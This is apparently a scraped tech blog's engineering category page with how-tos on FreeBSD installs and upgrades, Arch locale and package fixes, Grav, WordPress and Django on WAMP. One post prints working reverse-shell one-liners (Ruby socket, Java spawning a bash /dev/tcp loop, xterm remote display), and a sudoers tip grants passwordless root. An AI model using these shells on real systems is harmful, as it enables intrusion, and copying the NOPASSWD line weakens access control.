The “engineering” category is for posts related to network and systems engineering. These consist of how-tos, walkthroughs, configuration files and other things computer engineers would find similarly useful.

Building a perfect FreeBSD desktop workstation

Building a FreeBSD Workstation

Building a FreeBSD desktop doesn’t have to take you several days. It doesn’t even have to take longer than an hour.

Of course, you can take your time and compile your own optimized FreeBSD kernel, specifically for your hardware. And, build everything from source using the ports tree. But, many of you, like me, just want to get a graphical FreeBSD desktop up and running before you bother with all of that.

So, for those of you that aren’t familiar with this method, allow me to show you how to install and configure any popular FreeBSD desktop environment, in under an hour (give or take).

Install the FreeBSD Base System

A FreeBSD desktop typically consists of two main parts. Traditionally, you will have a server and a client. The server is usually referred to as your “display manager”, and the client is usually referred to as a “window manager”. These can be a pain in the ass to configure, by hand, if you don’t have the FreeBSD manual to constantly refer to. And, getting all of the various settings just perfect can be nearly impossible without help or lots of time. So, we’re going to do a generic installation, just to get up and running. We can always optimize our FreeBSD desktop later.

Boot the FreeBSD installer from official media

Go ahead and find the FreeBSD installation media appropriate for your architecture. They should be listed on FreeBSD’s official website. I’ll be working with FreeBSD 12.1-RELEASE and the amd64 architecture, for the purposes of this tutorial. I usually use KVM/libvirt/QEMU for virtualization. But, for the purposes of this blog post, I am going to use Oracle’s VM VirtualBox. If the reasons for that aren’t immediately clear, it’s because it tends to be used more frequently.

That, and I’m slightly certain the KVM/libvirt/QEMU crowd don’t need this tutorial.

From Oracle’s VM VirtualBox dashboard, select New to create a new virtual machine. This virtual machine will host our FreeBSD desktop environment.

After selecting New from the dashboard, VirtualBox should open another window. Here you can name your virtual machine. This is where you set your default hostname. You can change it later, if you want. Select ‘Next’.

Then it will ask you how much RAM you want to allocate. I have a large amount of RAM, so I allocated 20GB. I don’t expect you to have that much, nor will you need it. But, you should be generous with your RAM and your desktop environment. These days, I’d say, go ahead and give it 4GB or more. But, you can certainly get by with much, much less.

After that, you’ll select the type of virtual disk image you’d like; this is your virtual hard disk. I selected virtual disk image or ‘VDI’. And, I allocated a decent amount of space for the desktop software. You’ll need a bit more if you decide to compile the desktop from source than if you simply install packages from the binary package repository. So, bear that in mind when you decide how much space to give your machine.

The type of workstation you want should factor in to how much virtual hard drive space you allocate, as well. So, a more full-featured desktop like Gnome or KDE should be allocated more space than their lightweight desktop counterparts, like XFWM, LXQT, awesome, etc.

I selected dynamically allocated, because my hardware isn’t going to see much of a performance boost from being preallocated. Though, in all cases it would help to be preallocated. Once you’ve finished doing all of that, you should find yourself back at the VirtualBox dashboard.

Configure the base system to install FreeBSD

Once you boot into the installation program, go ahead and select ‘Install’. After that you’ll need to tell it your keymap, if it has not automatically detected it. For a lot of you that’s going to be ‘US’ for United States. Next, it’ll ask you to select a hostname for the base system. And finally, you’ll partition your harddrive and select some default packages to have installed.

Partition your hard drive and select FreeBSD packages

FreeBSD has an amazing file system called ZFS that you should check out. It’s pretty much better than sex. I highly recommend it. But, again, for the purposes of this video, I’m selecting UFS. UFS is also a great file system. FreeBSD has some amazing technology that is all worth investigating.

I also chose to install FreeBSD onto a single partition, which isn’t exactly recommended, but it’s an option. This was for the sake of ease while writing the article. If you’re a first time user or otherwise can’t be bothered to manage multiple partitions, one partition that takes up your entire virtual disk will be fine for you as well.

For my boot partition I chose Master Boot Record or ‘MBR’; BSD and GPT are also acceptable.

Set FreeBSD’s local root password

It’ll now prompt you to set the password for root. Root is what you think, it’s your superuser account. A notable difference between root on linux and BSD is the ‘wheel’ group. Be sure to select a very strong password for your root account. Any compromise of the superuser account would mean that the entire machine was compromised.

Setup networking for FreeBSD

Now, since I chose a network installation, I am required to setup networking or quit. You may be able to continue without doing so. Hopefully it will detect your network device, most of yours will be built-in. If not, you should attach it before proceeding and see if it will detect it.

As well, most of you will want to select DHCP for a dynamically allocated network. If not, you can punch in your static network settings at this time. For IPv6 enabled networks, your DHCP option is likely called SLAAC. Go ahead and enable that, if you need it.

Next you’ll set the system’s timezone. For me, that’s America/New_York. So, I selected North America, United States and then Eastern (most areas). You should select the appropriate timezone as it applies to your system.

Select FreeBSD boot services and hardening options

Now you’ll select which services to start with FreeBSD at boot time. For my purposes, I chose to enable SSHD for remote shell access and ntpdtime so my clock would synchronize with internet time servers at boot. This is a pretty critical stage. But, for building a workstation, you’ll mostly only need to be sure your time syncs appropriately here.

For the FreeBSD hardening options, you can safely enable them. However, some of the options will make debugging difficult, if you’re a developer. Since this is a daily driver, a workstation or otherwise a desktop, I strongly recommend you disable sendmail, as you should only have a need for local mail, and remote logging, as you shouldn’t need to access your log files on a remote server. Again, if you can justify leaving them enabled, then go ahead.

I find it very useful to clear /tmp at boot time. This is a performance option that I prefer and recommend.

After that, you’ll create your first user and set a password for that account. And you may proceed to create any other user accounts that you think you might need or want. I chose to add my user to the wheel group. At this point the base installation is finished. You’re going to exit the installer and reboot into the system. So you can start building it. We’re going to dive straight in, so when you get a chance be sure to remove your installation media before rebooting. Reboot. :)

Reboot into FreeBSD and perform a distribution upgrade

If you fail to remove the installation media, it will boot you back into the installer. It’s okay for that to happen. Just be sure to remove the media at that time and hit CTRL-ALT-DELETE to reboot again. Then select Multi-User at the boot options screen and log in with your ‘root’ account to prepare the system for its desktop environment.

We have a few small configuration changes to make manually. Actually, for our purposes of getting into a desktop early, we’re just going to install the packages we need to function, make sure the system is up-to-date and configure them.

Once you’re logged in, run the following two commands to check for core FreeBSD system updates, download and install them. If you did have available updates to install, follow the instructions on screen and reboot.

freebsd-update fetch && freebsd-update install

Install sudo and FreeBSD’s desktop-installer

pkg install sudo desktop-installer

Now, I kind of let it correct me here. Because, it’ll ask to update your binary package repository for you, when you ask for it to install the first package. You’ll want to accept that, so you have the latest version of the desktop-installer script.

Once that’s complete, edit the ‘/usr/local/etc/sudoers’ file and add the user you created to sudoers. This way, when you’re logged into the desktop shortly, you can log in as your user and sudo to root to configure the system or install other desired packages.

If you’re unsure how to add your user account to sudoers, open ‘/usr/local/etc/sudoers’ by typing ‘edit /usr/local/etc/sudoers’, search for the uncommented line that reads ‘root ALL=(ALL) ALL’ and below it add ‘<your username> ALL=(ALL) NOPASSWD: ALL’

This will enable that user account to use the sudo command and run commands as root. With NOPASSWD, sudo does not ask that user for a password.

After that, run the desktop-installer to begin installing your FreeBSD daily desktop workstation.

FreeBSD’s desktop-installer script works very well!

Now, most of this script should be self-explanatory and it actually doesn’t take that long to run (depending on your FreeBSD workstation’s specifications). But, I’ll walk you through it anyway. Because, perhaps you’re not familiar with “BSDisms”.

Right away, it asks us if you want to install and configure a firewall. As a workstation this is a big yes. It’ll warn you that changing your firewall settings runs the risk of disconnecting your SSH session. Really, this is rarely the case, unless your keep-alive is about to time out or something, between reading here and acting there. The danger would be more along the lines of if you get disconnected. So, if you happen to close the SSH port, or if you’re unsure, be sure to make sure your SSH port is not blocked before you disconnect.

Finally, it should ask if you want to update to the latest and greatest binaries/ports tree or use the quarterly snapshot release. We want the latest and greatest. For one, we want our desktop-installer script to be as current as possible, so that if there are any quirks in hardware drivers that have been patched, we get the fixes. Second, generally we want the latest and greatest on FreeBSD. May the daemon be with you and give you the power to serve! ;)

You can choose either, but when it asks how you’d like to update your copy of the repository, I prefer ‘portsnap’.

Desktop-installer for FreeBSD: Round 2

Once the repository finishes updating, the desktop-installer script will restart. It can take a while, FreeBSD developers release early and often. So, now it should remember our selections and we can jump right through to selecting a desktop environment to work with.

For firewall type, I chose option 5 (protect this machine only using stateful rules). This is likely the option you want, but, as always, if your goals are different from mine, choose the option most appropriate. Take this moment, if you have another machine to verify that your SSH port is still going to be open, if you fear that it has closed. That is, if you are installing over SSH, I mean.

Next it’ll prompt if you want to update. Fuck yeah, you definitely do. Go ahead and agree to that and it’ll restart. This should be the last restart before we’re booting into a desktop. :)

It’s time, finally installing a desktop environment for FreeBSD

When you boot back up, you can run the desktop-installer script for the final time. It will have remembered your earlier selections, but you should still pay close attention to be sure nothing has gone wrong. Remember, again, that when you reach the point of updating your repository to be current instead of quarterly, you should select ‘no’ or else you’ll be back in that loop.

I actually chose KDE this time, just to see if it would successfully pull down my preferred desktop. Generally, when I’m at this stage of a configuration, I go with a smaller desktop environment, just to get up and running quickly. And, the latter is what I recommend to you.

LXQT, MATE, XFCE4, Lumina, IceWM, WindowMaker and fluxbox are all such options. Among them I favor MATE and LXQT, depending on whether I want GTK or QT respectively.

 

Fast and easy, proper FreeBSD workstation setup

And there you have it. A proper, fast and easy FreeBSD desktop deployment. Enjoy!

2020-08-11T21:45:39-04:00 | August 3rd, 2020 | Categories: Engineering

Execute a Command on All Files in a Folder

Run a Command Against All Files in a Folder

How to rename all files in a folder:

For a very long time, Microsoft Windows did not ship with Powershell. In fact, it did not ship with any kind of shell at all.

So, when Windows users would ask me about Linux, or any other operating systems, that was one of the main things I would point out to them. At least, if they were “tech savvy”, the raw power of having a shell versus “just a command prompt”. And how scripting in the command line, on the fly, is invaluable. I’m sure it’s invaluable everywhere, but I found it especially invaluable in the security world.

Here’s a one line command to create a “for loop” and execute that command on each file found in a particular folder:

for i in *; do mv "$i" "$i.conf"; done

Yup, it’s that easy in BASH.

The above command will iterate (duh) the ‘move file’ command and append ‘.conf’ to the end of the filename, by “moving” those files to the same folder but with .conf added to their name. Yes, it does essentially just rename them.

You’re welcome and remember to wash your hands.

2020-07-01T16:00:15-04:00 | June 23rd, 2020 | Categories: Engineering, One Liners

locale: Cannot set LC_ALL to default locale: No such file or directory

Cannot Set Default Locale

This time, as almost every time before it, it is all my fault. I decided to use an untested tool, to help with my clean up tasks, during some maintenance and I am paying the price. I just reconfigured the default locale, one of the first things you configure when you’re installing linux.

This is the second problem I’ve bumped into and I realize now that I’ve bungled my /etc/. Being an engineer, this is okay. But, for some of you, this would be reinstall time. Allow me to rewind.

Suddenly, I can’t use ‘sudo’. Have I been hacked?

I was alarmed during the maintenance, because suddenly it seemed as if my password had changed or I otherwise could no longer use ‘sudo’. I also tried to switch users with ‘su’, into root, and that wasn’t possible for me either. You may find this odd, but that was actually a relief.

Obviously, I was aware that I was doing maintenance and cleaning up file lint (in this case, a lot of “.pacnew” files in etc, as well as “.old” had begun to pile up). In my haste to make good time and get back to work, I went ahead and told a particular tool to go ahead and replace the files with the “.pacnew”. I should’ve made sure to check that it was going to replace /etc/shadow. But, I didn’t.

Restoring /etc/shadow on Manjaro

Realizing the problem, I powered down and grabbed my bootable USB stick, loaded with a Manjaro installation image. For this trick, you can likely use any bootable linux distribution. I’d even recommend a distribution that is intended to be run from removable media. Because, that way, if you find your situation to be much worse, you have more tools at your disposal.

It booted into the live linux just fine. I unlocked my encrypted drive and mounted it. Browsing to the ‘etc’ folder, I was fortunate enough to find my shadow.old file sitting there. As well, I can proudly say that it did have the correct permissions set as well. So, my backup shadow file was not exposing sensitive secrets. An easy fix for me, but what if you don’t have your old shadow file?

In that case, the go-to fix is to set the password to a known value, so you can copy and paste it into other accounts, to restore normality. Once you’ve achieved that, you can reset those other accounts to stronger passwords once more. Let’s get back to the default locale issue.
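An added example, not part of the original post: before letting any tool replace files with their .pacnew versions, list what is pending, hold back the account databases, and check that copies such as shadow.old are not accessible to group or other. The protected-file list, the function names and the owner-only expectation are assumptions, and the demo tree is constructed.

```shell
#!/bin/sh
# Added example (not from the original post). PROTECTED and the owner-only
# rule for shadow copies are assumptions; adjust them for your distribution.

PROTECTED="passwd shadow group gshadow sudoers"

# classify_pacnew ETC_DIR
# For every *.pacnew under ETC_DIR print "REVIEW <target>" when the target is
# a top-level account database that must be merged by hand, else "MERGE <target>".
classify_pacnew() {
    find "$1" -type f -name '*.pacnew' | sort | while IFS= read -r new; do
        target=${new%.pacnew}
        rel=${target#"$1"/}
        case " $PROTECTED " in
            *" $rel "*) printf 'REVIEW %s\n' "$target" ;;
            *)          printf 'MERGE %s\n' "$target" ;;
        esac
    done
}

# loose_shadow_copies ETC_DIR
# Print every shadow/gshadow copy (shadow.old, shadow-, shadow.pacnew, ...)
# that grants any permission bit to group or other.
loose_shadow_copies() {
    for f in "$1"/shadow* "$1"/gshadow*; do
        [ -f "$f" ] || continue
        for bit in 040 020 010 004 002 001; do
            if [ -n "$(find "$f" -prune -perm "-$bit" -print)" ]; then
                printf '%s\n' "$f"
                break
            fi
        done
    done
}

# Demo on a constructed tree, so nothing under the real /etc is touched.
demo=$(mktemp -d)
: > "$demo/pacman.conf.pacnew"
: > "$demo/shadow.pacnew"; chmod 600 "$demo/shadow.pacnew"
: > "$demo/shadow.old";    chmod 644 "$demo/shadow.old"
classify_pacnew "$demo"        # pacman.conf is MERGE, shadow is REVIEW
loose_shadow_copies "$demo"    # reports shadow.old, which is world-readable here
rm -rf "$demo"
```

Anything reported as REVIEW should be merged by hand with a diff against the live file rather than swapped in.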

 

 

locale: Cannot set LC_ALL to default locale: No such file or directory

Now, I’m familiar with why this happens. But, I was a little annoyed this time. Normally, a quick export LC_ALL=en_US.UTF-8 solves all problems (for Americans speaking English, anyway.. your default locale may be different). Well, that’s only because you’re used to SSHing into your linux machines. I realized, the second time I launched a terminal and the problem had returned, that I had done more damage before than I originally thought.

But, the optimist in me wanted to think that maybe wasn’t the case. So, I waded through all of the other possible default locale issues and the people responding, and upvoting, the above export LC_ALL fix. Turns out, often, someone has changed a profile setting, or other preference, in their terminal emulator (this is possible, it just wasn’t my problem). So, I check those and still nothing.

Finally, I bother to check /etc/locale.gen. Sure enough, it is default, everything is commented out. So, for me the fix was to purge my locale, uncomment my preferred locale in /etc/locale.gen and run locale-gen with sudo or otherwise as root.
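The fix described above (uncomment the locale in /etc/locale.gen, then run locale-gen), as an added example rather than the commands from the original post. The function names are my own and the sample file is constructed, so the demo does not touch the real /etc/locale.gen.

```shell
#!/bin/sh
# Added example (not from the original post). Works on any copy of locale.gen.

# enable_locale FILE "LOCALE CHARSET"
# Uncomment the matching entry in FILE. Idempotent; returns 1 and leaves FILE
# untouched when the entry is not listed at all.
enable_locale() {
    gen_file=$1
    want=$2
    tmp=$(mktemp)
    if awk -v want="$want" '
        {
            line = $0
            sub(/^#[ \t]*/, "", line)      # drop the comment marker
            sub(/[ \t]+$/, "", line)       # and any trailing blanks
            if (line == want) { print want; found = 1 } else { print $0 }
        }
        END { exit(found ? 0 : 1) }
    ' "$gen_file" > "$tmp"; then
        cat "$tmp" > "$gen_file"           # keeps the file owner and mode
        rm -f "$tmp"
    else
        rm -f "$tmp"
        return 1
    fi
}

# enabled_locales FILE: print the entries locale-gen would build.
enabled_locales() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | sed 's/[[:space:]]*$//'
}

# Demo on a constructed file where everything is commented out, as in the post.
demo=$(mktemp)
printf '%s\n' '# Configuration file for locale-gen' \
    '#en_GB.UTF-8 UTF-8  ' '#en_US.UTF-8 UTF-8  ' > "$demo"
enable_locale "$demo" 'en_US.UTF-8 UTF-8'
enabled_locales "$demo"
rm -f "$demo"
# On the real system, as root:
#   enable_locale /etc/locale.gen 'en_US.UTF-8 UTF-8' && locale-gen
```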

 

 

All in all, I’m just taking this opportunity to allow errors to crop up, so that I can blog about fixing them.

Work your way back from system-wide to local user applications.

If your locale issues keep coming back, exporting the appropriate default locale is only a temporary fix for that session, you’ll be wanting to check your terminal emulator (if applicable), local “dot files” that manage those settings and above all your system wide configuration. To save time, it’s best to actually do that in the other order. Start with the system wide configuration and work your way back into user configurations and finally down to specific applications.

Don’t let little problems ruin your day. Hire Gray Hat Freelancing to troubleshoot your next issue, fill out our form and we will give you a free consultation! We are “DevSecOps”, we do everything.. or, at least, it’s easier to list the things we can’t do. So, check us out!

2020-07-07T01:59:31-04:00 | May 28th, 2020 | Categories: Engineering, Random Fixes

Installing Grav CMS from the Terminal

Installing Grav CMS using the Command Line

Grav CMS is a great flat-file CMS written in PHP. It’s been around for a while and features plenty of themes and plugins. Though, the community around it tends to roll their own.

Written in Twig, PHP, CSS, HTML and Markdown, Grav finds itself one of the fastest CMS out there. It’s a real competitor to WordPress and Drupal, especially if you have a good web developer. Let’s deploy one, so we can play with it.

How to get Grav and where to extract it.

Grab the latest zip from https://www.getgrav.org or https://github.com/getgrav/grav. Note: If you choose to use github and do not plan on doing any core development on the CMS, it’s a better idea to get a zip from the website or the Releases tab on GitHub.

Once you have the latest release, go ahead and sftp it up to your webserver and follow right behind by SSHing in. Extract the compressed release archive and move all of the files into webroot. Be careful not to forget hidden files, often “dot files”, like ‘.htaccess’.

Internal Server Error – How to fix Grav’s file permissions.

Now that that’s out of the way, all we need to do is fix the file permissions and we’re up and running. Once we check that, we should go ahead and install some useful bits.

I’m going to grab the admin plugin, so I can manage Grav’s flat file CMS from the comfort of a web GUI. Please note, that if you decide to do the same, you’ll want to break out your web browser again. So you can register an admin on the world’s fastest flat file CMS before some random miscreant comes by and does it him or herself.

Now you can pick a theme and start blogging with Grav!

If you need any kind of back end server work, Gray Hat Freelancing is eager to help. Fill out this form for a free consultation!

2020-07-23T06:53:46-04:00 | May 27th, 2020 | Categories: Engineering

nss: p11-kit-trust.so exists in filesystem

ERROR: Failure while downloading nitrux-icon-theme

Arch/Manjaro Update Fails Downloading nitrux-icon-theme_3.5.3.tar.gz

I really hope this didn’t stump any of you. It’s okay, if it did, you probably didn’t use the console and therefore probably didn’t see what actually failed. So, the link to the package, nitrux-icon-theme_3.5.3.tar.gz, is dead. Which makes it kind of hard for the PKGBUILD script to download it, build it and install it.

Locating the missing source for nitrux-icon-theme on the AUR

And, if you run a quick pacman -Qi nitrux-icon-theme you quickly see there’s supposed to be a nitrux website at https://nitrux.in/. But, trying to go there, you can see they closed their doors. The project forked into two projects now known as NX Desktop and Nitrux OS.

I’m probably wrong (according to my girlfriend, I am always wrong), but since the launchpad.net team references the Nitrux OS domain, and it was the last source in the PKGBUILD in the AUR, I kind of assume it was the more “official” source (at least as far as following the package maintainer’s intent). Looking quickly at their website, we get sent off to trusty old GitHub where the repository is now Archived (this means, no longer supported).

Quick patching the PKGBUILD file for missing source nitrux-icon-theme

There’s a chance here the AUR package maintainer has noticed this and simply wants the package to die. He’s not responded to quite a few comments on the AUR as well. Anywho, here’s the fix:

Edit the PKGBUILD for nitrux-icon-theme

  • Grab the latest release from GitHub: https://github.com/Nitrux/nitrux-icon-theme/archive/3.5.4.tar.gz
  • run md5sum on the gunzipped tarball
  • rerun pacman with --editmenu so it asks if you want to edit the PKGBUILD file
  • Select any option that allows you to edit the PKGBUILD file (for me, using yay, this was [A])
  • Update the source field with the latest available release
  • Update the md5sum field with the md5sum command’s output
  • Write and exit the PKGBUILD file
  • Continue the installation

ERROR: Failure while downloading nitrux-icon-theme – Fixed! Quickly!

wget https://github.com/Nitrux/nitrux-icon-theme/archive/3.5.4.tar.gz
md5sum 3.5.4.tar.gz
yay --editmenu -Syyu nitrux-icon-theme

Check out other random fixes on Gray Hat Freelancing.

2020-07-11T01:46:14-04:00 | May 22nd, 2020 | Categories: Engineering, Random Fixes

One Liner Reverse Shells, Remote Desktop Edition


So, it’s been a little while, since I shared some one line reverse shells with you guys. Here are a few “obscure” ones, if you ever find the need for them. I do not recommend bothering with the remote Xsessions. But, to each their own.

 

Xterm One Line Reverse Shell

 

You’ll need to listen on port 6001 using a tool like xnest, try xnest :1 and then:

 

xterm -display 10.0.0.1:1

 

Boom! Remote desktop.

 

Ruby Reverse Shell in One Line

 

Listen on port 1234, obviously.

 

ruby -rsocket -e'f=TCPSocket.open("172.16.16.169",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Java One Line Reverse Shell

 

This one is cross-platform, as Java always tries to be. Listen on port 2002

 

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.16.169/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
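Seen from the defending side, each of these one-liners leaves a recognisable process command line. The following is an added example, not part of the original post, that scans `ps -eo pid,user,args` style lines for those shapes; the rule names are my own, and the sample lines are constructed, use documentation addresses and are abbreviated with "...".

```shell
#!/bin/sh
# Added example (not from the original post). Command-line matching only: it
# sees what process accounting or an EDR agent records, not network traffic.

# match_rule CMDLINE: print a rule name, or nothing when no rule matches.
match_rule() {
    if printf '%s\n' "$1" | grep -Eq '/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'; then
        echo bash-dev-tcp          # also covers the Java variant, which spawns bash
    elif printf '%s\n' "$1" | grep -Eq 'ruby.*-rsocket.*TCPSocket.*exec'; then
        echo ruby-socket-exec
    elif printf '%s\n' "$1" |
             grep -Eq 'xterm.*[[:space:]]-display[[:space:]]+[^:[:space:]]+:[0-9]' &&
         ! printf '%s\n' "$1" |
             grep -Eq -e '-display[[:space:]]+(localhost|127\.0\.0\.1|unix):'; then
        echo xterm-remote-display  # a display on another host, not :0 or an SSH forward
    fi
}

# scan_cmdlines: read "PID USER COMMAND..." lines on stdin and print
# "rule pid user" for every hit.
scan_cmdlines() {
    while read -r pid user cmd; do
        rule=$(match_rule "$cmd")
        if [ -n "$rule" ]; then
            printf '%s %s %s\n' "$rule" "$pid" "$user"
        fi
    done
}

# Constructed sample input (192.0.2.10 is a documentation address).
sample_cmdlines() {
    cat <<'EOF'
 812 alice xterm -display :0
 977 www   ruby -rsocket -e f=TCPSocket.open("192.0.2.10",1234).to_i;exec sprintf(...)
1203 www   /bin/bash -c exec 5<>/dev/tcp/192.0.2.10/2002;...
1310 www   xterm -display 192.0.2.10:1
1422 bob   xterm -display localhost:10.0
1500 bob   ruby -rsocket -e puts TCPSocket.gethostbyname("example.org")
EOF
}

sample_cmdlines | scan_cmdlines
```

On a live host the same function can be fed with `ps -eo pid,user,args | scan_cmdlines`.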

 

 

2020-07-07T02:09:47-04:00 | May 20th, 2020 | Categories: Jeet Kune Crypto, One Liners

Post Thousands of Products on WooCommerce Instantly

How to Post Thousands of Products on WordPress Instantly

Importing large amounts of product data into WordPress / WooCommerce can be a daunting task. Here’s how you can instantly publish thousands of products on WooCommerce using the terminal.

mysql -u dbuser -p dbname
update wp_posts set `post_status` = 'publish' where `post_type` = 'product';
If you guessed that we’d use the command line to publish thousands of products, good for you. :)

SQL databases are awesome! That’s right, and you can simply change ‘publish’ to ‘draft’ to delist thousands of products as well. You should take a look through wp_postmeta and see all the various meta keys you can use to filter products and work with your catalog through the command line. It’ll save you time and money.

2020-07-24T10:26:35-04:00 | May 11th, 2020 | Categories: Engineering, One Liners

The Fastest Way to Upgrade FreeBSD 11 to FreeBSD 12

How to Quickly Upgrade FreeBSD 11 to FreeBSD 12

Ever need to upgrade FreeBSD to the next release? It’s not hard! We can compile kernels some other day. Today, we’re just going to do binaries. Quick and easy, FreeBSD is the best.

Go ahead and log in to your machine, elevate yourself up to root (or use sudo). Let’s get this show on the road: freebsd-update fetch

freebsd-update fetch && freebsd-update install

This process is not hands off. So, you’ll need to accept a few prompts. Generally, this is the only time you’ll really have to reboot FreeBSD, if you’ve been treating it well. But, in this case, I don’t run into the need for that (heh).

Once the update tool finishes grabbing all of the patches and applying them, we’ll need to update the pkg tool. The pkg tool is used to maintain binary packages on the system. If you’re a sane person, you either use pkg or the ports tree. The sanest people build binary packages from ports and keep a local repository, but that’s for another article.

Upgrading Binary Packages on FreeBSD

This tool keeps things as simple as they can be. So, if you’re familiar with POSIX compliant systems, you’ll recognize this process. Let’s continue to upgrade FreeBSD 11 to FreeBSD 12.

Use the static pkg binary to update the tool and then all of the installed packages. Again, I’m just going to go ahead and bang it out in one line. Any time you see me use &&, you can safely break the command into two commands, if you want. It is two commands anyway, just on one line.

pkg-static upgrade pkg && pkg upgrade

Yeah, that’s a lot of packages. Let’s make sure we’re on the latest FreeBSD 11 release, which should be FreeBSD 11.3.

uname -a

Completing the Upgrade FreeBSD Process

Good. Now we can get back to upgrading the kernel to the next major release. Time’s running out for security updates for 11.3 and we don’t want to still be around, once it does. Back to the freebsd-update tool:

freebsd-update upgrade -r 12.0-RELEASE

This one will take a while. It should inspect your system and ask you if you agree with what it has found, then it should go grab a matching FreeBSD 12 image to apply on top. Now we will need to reboot. But, take a walk, if you want, make a sandwich or whatever.

We’re almost done. We need to check some things and that’s about it after this. You can e-mail me if you want me to do any of these things for you. Please do not forget that. It’s how I put food on the table.

Next Time Don’t Wait So Long to Upgrade FreeBSD!

You guessed it! We’re going to go ahead and apply all of those, oh so many, packages. Run freebsd-update install

freebsd-update install

It goes faster than you’d think. And, since we’ve finished patching away from FreeBSD 12, we now need to reboot and finish the final details of this FreeBSD version upgrade.

reboot
freebsd-update install

Congratulations! See how easy that was? I really love FreeBSD!

Apparently it wants us to run freebsd-update install three times, this time. If you compiled packages from ports, you’ll absolutely need to do this. And, if you didn’t, you’ll want to do this anyway because it removes a bunch of file lint that you’d otherwise have to remove yourself.

Either way, welcome to FreeBSD 12.0-RELEASE!

freebsd-update install
uname -a

The hackers at Gray Hat Freelancing are here to help you with any project you have that’s IT related. Tell me what you want to do and I’ll tell you how I can help you achieve that end. Have a good one!

2020-07-24T10:27:27-04:00 | April 28th, 2020 | Categories: Engineering

p11-kit-trust.so exists in filesystem – Quickly Fixed!

Yikes! This page went to shit during migrations. I apologize for that. I will make a note to pay better attention to my SEO errors. The gist of this blog post was covering errors around “yay build file exists“. So, I’ll rebuild it from memory, the best I can. Hope this helps!

error: failed to commit transaction (conflicting files)

sudo pacman -Syyu --overwrite /usr/lib/p11-kit-trust.so --overwrite /usr/lib32/p11-kit-trust.so

This worked out just fine for me. The files were safely overwritten and the machine continued to function without any problems. So, if it’s simply a matter of an existing file that’s not shared by other packages, feel free to overwrite it.


2020-07-14T00:05:36-04:00 | April 20th, 2020 | Categories: Engineering, Random Fixes

WordPress Deploy from Termux, Hilarious

WordPress Deploy from Termux

Here I am, performing a wordpress deploy from termux. Using only my cell phone, I launch termux and SSH into my laptop. I create a linux debian virtual machine. Then I connect to that machine, update linux debian 9 aka “buster” to current, linux debian 10 aka “sid”.

wordpress deploy from termux
WordPress Deploy from Termux & Debian Buster Updated to Sid

LAMP Installation and Configuration from Termux

From there, I turn it into a LAMP server. This means I install Apache, MariaDB (a stand-in for MySQL) and PHP. I configure Apache for php-fpm and mpm_event (in a rough way), then I install all the PHP modules required to run WordPress.

MySQL Administration from Android Linux

I also lock down MariaDB with mysql_secure_installation. I use mysql from the command line to create a SQL database and a password-protected SQL database user, and give the SQL database user access to the SQL database.

I proceed to download wordpress and extract it to web root. I set the right file ownership and file permissions for the Apache web server. Finally, I open a browser, configure wordpress’s install script and run it, followed by creating an administrative user. That completes the first half of my adventure doing a wordpress deploy from termux.


WordPress Installation from a Mobile Phone

I forgot my wordpress administrative password. So, I backup the files and database. Power down the virtual machine. Destroy it. And then I build a new one. But, this time I upgrade linux debian 9 “buster” to linux debian 10 “sid”, or the “bleeding edge”. It’s also known as the unstable branch. I, again, turn it into a LAMP server. And, finally I restore wordpress, from the backup that I made, in the exact same way that you’d recover wordpress from a disaster. Like, if you were hacked or suffered a similar disruption.

WordPress Disaster Recovery

Essential WordPress disaster recovery. And I do it all from my smart phone, using Termux on Android.

https://www.youtube.com/watch?v=pD1piFpAmiY

Network and Systems Engineering from a Linux Android device
Freelance Gray Hat Hacker for Hire

2020-09-02T05:50:39-04:00 | April 19th, 2020 | Categories: Engineering, Errata

Quickly Configure Up Django on WAMP (mod_wsgi & Windows 7)

You should note that I do not advise running Microsoft Windows. Or any software that is end-of-life, unless you are able to patch it yourself. And, so, I especially do not advise people to go configure Windows 7 to host Django using mod_wsgi.

 

Configuring Django on a WAMP Host

 

 

Getting Apache ready for Django, on a WAMP host machine, can sometimes be problematic. Particularly because setting up mod_wsgi on Windows (in this case Windows 7) isn’t always straight forward. I’ll be using the deprecated Python 2.7 on Windows with WampServer installed.

 

django on wamp
Why me?!

Install the mod_wsgi Apache module

  1. Download mod_wsgi-win32-ap22py27-3.3.so. Or download your respective .so compatible file
  2. Change its name to mod_wsgi.so and
  3. Copy it to $DRIVE/Program Files/Apache Software Foundation/Apache22/modules 
  4. Open httpd.conf as Administrator, or equal. Here, you’re going to find a list of lines with “LoadModule” followed by a bunch of other “.so” files. Simply add LoadModule wsgi_module modules/mod_wsgi.so to that list.
  5. Restart Apache.

 

django on wamp
Django on WAMP :(

 

Creating Configuration Files for Django on WAMP

 

  1. Next you have to point it at Django
  2. In your Django project root folder, create an apache folder
  3. Change into that directory and create a file named django.wsgi
  4. And, finally create a file named apache_django_wsgi.conf
  5. Go back to apache’s httpd.conf and add the following line at the bottom of the page: Include "$DRIVE:/projects/mysite/apache_django_wsgi.conf"
  6. Now put these lines in django.wsgi:

 

Populating Configurations for Django on WAMP

 

import os, sys

sys.path.append('D:/projects/mysite')
os.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings'

import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()

 

  1. Open apache_django_wsgi.conf and prepend:

 

Alias /images/ "D:/projects/mysite/templates/images/"
<Directory "D:/projects/mysite/templates/images">
Order allow,deny
Allow from all
</Directory>

WSGIScriptAlias / "D:/projects/mysite/apache/django.wsgi"

<Directory "D:/projects/mysite/apache">
Allow from all
</Directory>

<VirtualHost *:80>
    DocumentRoot D:/projects/mysite
    ServerName 127.0.0.1

</VirtualHost>

 

Finished Setting Up Django on Windows!

2020-07-01T18:11:40-04:00 | April 18th, 2020 | Categories: Engineering

The Best FreeBSD Kernel Config as a VirtualBox Guest

About our FreeBSD Kernel Config

This is what we, at Gray Hat Freelancing, use for a FreeBSD kernel configuration when FreeBSD is running on VirtualBox as a guest. This is one of the smallest possible FreeBSD kernel configurations. There’s a little more you could trim off, but not a lot.

smallest possible freebsd kernel config for virtualbox
the power to serve

It’s highly recommended that you run FreeBSD as a VirtualBox host. But, if you must run it as a guest, why have all the extra kernel modules, right? I’ll help you compile this FreeBSD kernel configuration in another post, as well.

